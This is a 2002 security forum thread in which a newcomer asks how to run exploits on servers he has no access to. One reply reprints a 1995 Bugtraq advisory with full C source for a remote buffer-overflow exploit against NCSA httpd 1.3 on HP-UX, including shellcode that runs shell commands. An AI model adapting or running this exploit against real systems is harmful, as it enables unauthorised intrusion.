Results 1 to 8 of 8

Thread: Exploits a little confusing

  1. #1
    Junior Member
    Join Date
    Feb 2002
    Posts
    3

    Question Exploits a little confusing

    Total Newbie on exploits so sorry (I tried searching but couldn't find a topic)
    Now If I understand this correctly Exploits are code written in either C or Shell that exploits a vulnerability on a server that (depending on what exploit) can give you root or super admin access.
    I know where to get them.

    The problem I'm having is how to execute them
    I mean take a exploit in C (ntpd-exp.c)
    How do i execute it on a vulnerable server?

    Don't I have to have some access to the server (I mean wouldn't I have to log into the server to run it)?

    Lets say I don't have access to the server (I don't have an account on it)
    How would I exploit it (or run the exploit to get access)?

    Maybe I'm missing something here?

    How does Shell (a shell account) play a roll in exploits. How can I connect to a Target server with my shell account and run a exploit from there (say I wanted to run an exploit on a system I don't have access to. How would I get access to the target server to run it) ?

    So confusing.

    Where can I get help? or is someone willing to help a new b who just wants knowledge.

  2. #2
    Senior since the 3 dot era
    Join Date
    Nov 2001
    Posts
    1,542
    First of all, if you don't have an account on that server and your not involved in a wargame or an authorized hack attempt, than you arey cracking others servers. That's not the thing that ppl like here

    About exploits; exploits could be used to gain certain rights on remote boxes by using "mistakes" from the programmers. For instance if you enter a certain value for a variable and the variable is bad defined the prog could do 'funny' things that makes it possible to take over the box. An exploit is a prog that does that for you. Perhaps you discover a fault in Explorer (very common) well if you are a real talented programmer you could write your own tool to use that error to get some information about the target or to get actually in. There are many exploits and etc. I'am not going to write a tutorial on them here...

    (uhhh: don't start the flames and neg points for this)

    about your prog.c and running them... well you have to compile them first in an executable file, then you can use it.

  3. #3
    Senior Member
    Join Date
    Aug 2001
    Posts
    259

    Re: Exploits a little confusing

    Originally posted by new b
    Total Newbie on exploits so sorry (I tried searching but couldn't find a topic)
    Now If I understand this correctly Exploits are code written in either C or Shell that exploits a vulnerability on a server that (depending on what exploit) can give you root or super admin access.
    I know where to get them.


    Exploits are usually the resault of bad programming. they can be writen in any language most of the time they are found in the more powerfull languages like C or assembly. Shell scripting doesn't really deal with upper lv memory control or flags that control access so it's not typicaly looked at for exploits.


    The problem I'm having is how to execute them
    I mean take a exploit in C (ntpd-exp.c)
    How do i execute it on a vulnerable server?
    Don't I have to have some access to the server (I mean wouldn't I have to log into the server to run it)?

    If you had access then you probly wouldn't need to exploit the server.

    Lets say I don't have access to the server (I don't have an account on it)
    How would I exploit it (or run the exploit to get access)?

    Maybe I'm missing something here?

    that's the basis of almost all cracking.

    How does Shell (a shell account) play a roll in exploits. How can I connect to a Target server with my shell account and run a exploit from there (say I wanted to run an exploit on a system I don't have access to. How would I get access to the target server to run it) ?

    That's the other part of cracking. People study for years to learn this. A few posts on a forum arn't going to sumon the magical hacking lepricans to imput that 1337 haXor knowledge into your head.

    So confusing.

    Where can I get help? or is someone willing to help a new b who just wants knowledge.
    Alternate realities celebrate reality. If you cant handle the reality your in, then you wont be able to handle the one your attempting to escape to.

  4. #4
    Junior Member
    Join Date
    Feb 2002
    Posts
    3

    Re: Re: Exploits a little confusing

    Originally posted by zepherin

    If you had access then you probly wouldn't need to exploit the server.

    Exactly what makes me so confused on how to get the exploit on the server.
    And once on the server how do i execute it do I paste the WHOLE xploit and hit enter or do I upload the C file onto the server and use SYST EXEC. Can I execute the Xploit without uploading it on the server ?


    That's the other part of cracking. People study for years to learn this. A few posts on a forum arn't going to sumon the magical hacking lepricans to imput that 1337 haXor knowledge into your head.
    I totaly understand this and that is why I read just about EVERY tut on the subject.
    But when it comes to exploits I am so lost. I mean the Tuts I read tell me "To gain access on the box you can run an exploit" well wouldn't I need to gainn access before running the Xploit It seems like a vicous circle - to get access run an exploit - to run an exploit you need to get access - I mean thats where I think I'm misunderstanding something.

    as far as executing them (I pretty much understand what they do) Their are tons of sites that explain what the exploit does just not how its executed. I hear sites saying "oh this C Xploit attacks the hole in SMTP" how did they attack it how did they run the Xploit did they connect via Telnet to the SMTP server and just copy and paste the exploit in Telnet and hit enter? How did they EXECUTE the exploit ?

    In all honesty I want to get my own server for my design company but this exploit problems are realy seriously troubling me on the security of the server. If I knew how these Xploits are ran on the server I could better understand how to protect my box.

  5. #5
    Senior since the 3 dot era
    Join Date
    Nov 2001
    Posts
    1,542
    In all honesty I want to get my own server for my design company but this exploit problems are realy seriously troubling me on the security of the server. If I knew how these Xploits are ran on the server I could better understand how to protect my box.
    Since the FreeAgent issue I'am not going to believe you...sorry.
    my "trust" is at a very low level for the moment.

    It seems like a vicous circle - to get access run an exploit - to run an exploit you need to get access - I mean thats where I think I'm misunderstanding something.
    LOL

    sorry,

    some exploits like the one based on the recently found fault in Explorer 5.x and 6.x run a certain script that allows to run any executable.

    the sircam worm uses rundll32.exe, rundll32.exe enables to run a 32 bit function exported from a DLL

    So for instance some1 can send you a little prog that attempts to edit some files on your pc, like autoexec.bat or lmhost or replace a dll with a malicious one to create holes. but those progs are more like trojans...

    Do you really believe that gaining access to a server is simple: press ENTER ?????

    LOL, ROFL

  6. #6
    Senior since the 3 dot era
    Join Date
    Nov 2001
    Posts
    1,542
    For instance here's an example that it's not simple press enter or something... that would only be steeling some1 else work.

    credits for this example go to the original author: Thomas Lopatic

    HACK: NCSA "httpd" 1.3 can be tricked into executing shell commands
    Version: 1.3
    System: HP-UX 9.01, Unix?
    Source: Thomas Lopatic (lopatic@dbs.informatik.uni-muenchen.de) Bugtraq
    Date: Mon, 13 Feb 1995
    CIAC: Number F-11, February 14, 1995
    **************************************************************************

    We've installed the NCSA HTTPD 1.3 on our WWW server (HP9000/720,
    HP-UX 9.01) and I've found, that it can be tricked into executing shell
    commands. Actually, this bug is similar to the bug in fingerd exploited by
    the internet worm. The HTTPD reads a maximum of 8192 characters when
    accepting a request from port 80. When parsing the URL part of the request
    a buffer with a size of 256 characters is used to prepend the document root
    (function strsubfirst(), called from translate_name()). Thus we are able to
    overwrite the data after the buffer. Since the stack grows towards higher
    addresses on the HP-PA, we are able to overwrite the return pointer which
    is used to return from the strcpy() call in strsubfirst(). The strcpy()
    overwrites its own return pointer. On systems with a stack growing the
    other direction, we'd have to overwrite the return pointer of strsubfirst().

    I've implemented this attack for the precompiled HP-PA release provided
    by the NCSA. To adapt it to custom versions, you have to know the address
    of the buffer used by strsubfirst() and the offset of the return pointer.
    One might adapt the program to try 'probable' values, i. e. values within a
    certain range, if these parameters are not known. I've tried 'cc' and 'gcc'
    with and without optimization and the parameters didn't vary to much. A
    generic attack using brute force should therefore be possible.

    This is the program I've used to break into our WWW server. The assembly
    code could have been more compact, but I had to avoid 0x00 bytes. The
    program creates a file named 'GOTCHA' in the '/tmp' directory.

    Greetings and happy experimenting,
    -Thomas


    --- cut here ---

    /* hc.c */

    /* This program demonstrates a vulnerability in the NCSA httpd 1.3 */
    /* We make use of a buffer overflow in order to execute commands */
    /* on a HP host running the precompiled daemon provided by the NCSA. */

    /* The problem is that the array 'tmp' in the function 'strsubfirst()' */
    /* has a length of MAX_STRING_LEN. However, the function can be passed */
    /* arguments with up to HUGE_STRING_LEN characters. */

    /* The output of this program can be pasted into a telnet session */
    /* to port 80 of the host to be attacked. */
    /* Alternatively simply use 'hc | telnet www.victim.com 80'. */

    /* Written by Thomas Lopatic, lopatic@informatik.uni-muenchen.de */

    #include <stdio.h>
    #include <string.h>

    /* Instead of defining these macros we could try all probable values */
    /* in case the attacked host does not run the precompiled httpd. */

    /* The address of 'char tmp[MAX_STRING_LEN]' in the precompiled httpd. */
    #define TMPVAR 0x7b03df80

    /* This is an offset from TMPVAR. The return pointer for the call to */
    /* strcpy() is stored here (in the precompiled httpd). */
    #define RPOFF 0x160

    /* Byte order of the attacked HP is big endian. */
    #define SHIFT1 24
    #define SHIFT2 16
    #define SHIFT3 8
    #define SHIFT4 0

    /* Output the lower nibble of i */
    char d2a (i)
    int i;
    {
    i &= 0xf;
    return (i > 9) ? (i + 'A' - 10) : (i + '0');
    }

    /* This is the short assembly language program which will be executed. */
    char prog[] = {
    0x34, 0x59, 0x01, 0x02, 0x34, 0x5a, 0x01, 0x32,
    0x37, 0x5a, 0x3e, 0xf9, 0x6b, 0x3a, 0x3f, 0x01,
    0x63, 0x40, 0x3f, 0xff, 0x34, 0x5a, 0x01, 0x38,
    0x63, 0x40, 0x3f, 0x35,
    0x37, 0x5a, 0x3e, 0xf9, 0x6b, 0x3a, 0x3f, 0x09,
    0x63, 0x40, 0x3f, 0xff, 0x0b, 0x5a, 0x02, 0x9a,
    0x6b, 0x3a, 0x3f, 0x11, 0x34, 0x5a, 0x01, 0x22,
    0x37, 0x5a, 0x3e, 0xf9, 0x6f, 0x3a, 0x3e, 0xf9,
    0x20, 0x20, 0x08, 0x01, 0x34, 0x16, 0x01, 0x1e,
    0xe4, 0x20, 0xe0, 0x08, 0x36, 0xd6, 0x3e, 0xf9,
    0x0b, 0x5a, 0x02, 0x9a, 0x20, 0x20, 0x08, 0x01,
    0x34, 0x16, 0x01, 0x0a, 0xe4, 0x20, 0xe0, 0x08,
    0x36, 0xd6, 0x3e, 0xf9, 0xe8, 0x5f, 0x1f, 0x35,
    0x0b, 0x5a, 0x02, 0x9a,
    0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
    0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,
    0x00
    };

    int main ()
    {
    char buffer[400];
    int i;
    /* Copy program, append the arguments. The '$'s are replaced */
    /* with 0x00s by the assembly language routine. */
    strcpy (buffer, prog);
    strcat (buffer, "/bin/sh$");
    strcat (buffer, "-c$");
    /* Length of the argument must be exactly 30 characters. */
    /* Otherwise the '$' will not be replaced correctly. */
    /* strcat (buffer, "0123456789012345678901234567890123456789$"); */
    strcat (buffer, "echo GOTCHA >/tmp/GOTCHA $");
    /* Output the http request. */
    printf ("GET ");
    /* Output the program. */
    for (i = 0; i < strlen (buffer); i++)
    printf ("%%%c%c", d2a (buffer[i] >> 4), d2a (buffer[i]));
    /* Fill the buffer until we have reached the memory location */
    /* which contains the return pointer for strcmp(). */
    for (i = strlen (buffer); i < RPOFF; i++)
    printf ("X");
    /* Output the entry point for our program. strcmp() will */
    /* 'return' into our small assembly program. */
    printf ("%%%c%c%%%c%c%%%c%c%%%c%c\n",
    d2a ((TMPVAR + 0x60) >> (SHIFT1 + 4)),
    d2a ((TMPVAR + 0x60) >> SHIFT1),
    d2a ((TMPVAR + 0x60) >> (SHIFT2 + 4)),
    d2a ((TMPVAR + 0x60) >> SHIFT2),
    d2a ((TMPVAR + 0x60) >> (SHIFT3 + 4)),
    d2a ((TMPVAR + 0x60) >> SHIFT3),
    d2a ((TMPVAR + 0x60) >> (SHIFT4 + 4)),
    d2a ((TMPVAR + 0x60) >> (SHIFT4 + 4)),
    d2a ((TMPVAR + 0x60) >> SHIFT4));

    return 0;
    }

  7. #7
    Senior Member
    Join Date
    Dec 2001
    Posts
    1,193
    here's a good idea. Since you are concerned about security for your server, why don't you go to some of the execellent classes on this topic, say from foundstone, global knowledge, the big name computer firms etc. They will be glad to take your money and give you the basics.

    Or you could work on your own systems and be self taught

    there is a price for knowledge, strange how many want its' power without wanting to pay its' price.

    Trappedagainbyperfectlogic.

  8. #8
    Junior Member
    Join Date
    Feb 2002
    Posts
    3
    Oh $hit

    I should be reading compiling in C instead of asking how exploits work,

    I get it now I gotta compile the exploit.

    I think Ill read some C programming books and learn about C before posting about exploits.

    Thanks All

    Also do you have any suggestions on good Compilers?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •